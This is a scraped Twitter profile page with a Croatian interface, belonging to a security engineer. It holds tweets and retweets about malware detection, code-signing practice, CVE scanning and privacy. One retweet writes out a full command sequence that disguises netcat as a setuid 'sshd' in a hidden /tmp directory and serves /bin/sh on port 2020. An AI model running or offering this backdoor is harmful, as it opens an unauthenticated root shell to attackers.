Nathan Hunstad

@nathanhunstad

Principal Security Engineer & Researcher at Code42. Tweets are about infosec, are my own, and probably not worth reading.

Minneapolis, MN
Vrijeme pridruživanja: lipanj 2009.

Tweetovi

Blokirali ste korisnika/cu @nathanhunstad

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @nathanhunstad

  1. 1. velj
    Poništi
  2. 29. sij
    Poništi
  3. 28. sij

    Got shell? Learn about post-exploitation from Tom Bolen:

    Poništi
  4. proslijedio/la je Tweet
    28. sij

    1\ Surprisingly, you could build a very mediocre PE malware detector with a single PE feature: the PE compile timestamp. In fact, I built a little random forest detector that uses only the timestamp as its feature that gets 62% detection on previously unseen malware at a 1% FPR.

    Prikaži ovu nit
    Poništi
  5. 27. sij

    Check out my latest RedBlue42 blog post on implementing the Elastic Common Schema from :

    Poništi
  6. proslijedio/la je Tweet
    25. sij

    (A few) Ops Lessons We All Learn The Hard Way -- a Twitter 🧵:

    Prikaži ovu nit
    Poništi
  7. proslijedio/la je Tweet
    24. sij
    Odgovor korisniku/ci

    Test keys in CI. Prod rel resigned on separate rel infra with hsm. Prod sign is manual with ceremony. Prod signing is auditable and regularly audited. Rel infra monitored. Dev and rel infra disjoint set of admins. Rel infra isolated from corpnet.

    Poništi
  8. 22. sij
    Poništi
  9. proslijedio/la je Tweet
    21. sij

    I think it’s awesome you can now rack mount your employees

    Poništi
  10. proslijedio/la je Tweet
    20. sij

    Map of industrial control systems that are exposed to the Internet. The USA has by far the most exposed devices:

    Poništi
  11. 20. sij

    Users are avoided to stop locking their doors. Lockpicks exist and not all locks are properly hardened against some physical attacks.

    Poništi
  12. proslijedio/la je Tweet
    20. sij
    Odgovor korisniku/ci

    This is a terrible take.

    Poništi
  13. proslijedio/la je Tweet
    17. sij

    Test event collection for CVE-2020-0601. Used it to verify my forwarding works. Thank you

    Prikaži ovu nit
    Poništi
  14. proslijedio/la je Tweet
    10. sij

    Mass scanning activity detected from 82.102.16.220 (🇩🇪) checking for Citrix NetScaler Gateway endpoints vulnerable to CVE-2019-19781. Affected organizations are advised to apply the mitigation steps provided by Citrix as no patch exists yet.

    Poništi
  15. 8. sij

    Vendors, don't try to capitalize on world events by shamelessly trying to tie them to your tool in the most tenuous of ways. There is enough FUD around security without you piling on.

    Poništi
  16. proslijedio/la je Tweet
    6. sij

    This sums up the future of privacy and security so well. Not when every age demographic has a different ethically ambiguous app installed across millions of phones and tablets.

    Prikaži ovu nit
    Poništi
  17. proslijedio/la je Tweet
    1. sij

    RT if you get it, research it if you don't: mkdir /tmp/... cd /tmp/... cp `which nc.traditional` sshd chown root:root sshd chmod u+s sshd ./sshd -l -p 2020 -e /bin/sh

    Poništi
  18. 1. sij

    All of this should be automatic, opt-out, and failsafe. Applies to things like making credit freezes default-on as well. We keep using things like SSN and phone numbers as identities instead of identifiers. They should be treated as such as a result.

    Poništi
  19. proslijedio/la je Tweet

    Parenting New Year’s: * Find a ball drop on YouTube * Any year will do, seriously * Put it on at 8:45 * Everyone in the house asleep by 10:00 * Congrats you won we all won

    Poništi
  20. 29. pro 2019.

    Since long before I got into security, I've been a huge road geek. I've been reading this great publication on freeway development in the Twin Cities all day:

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·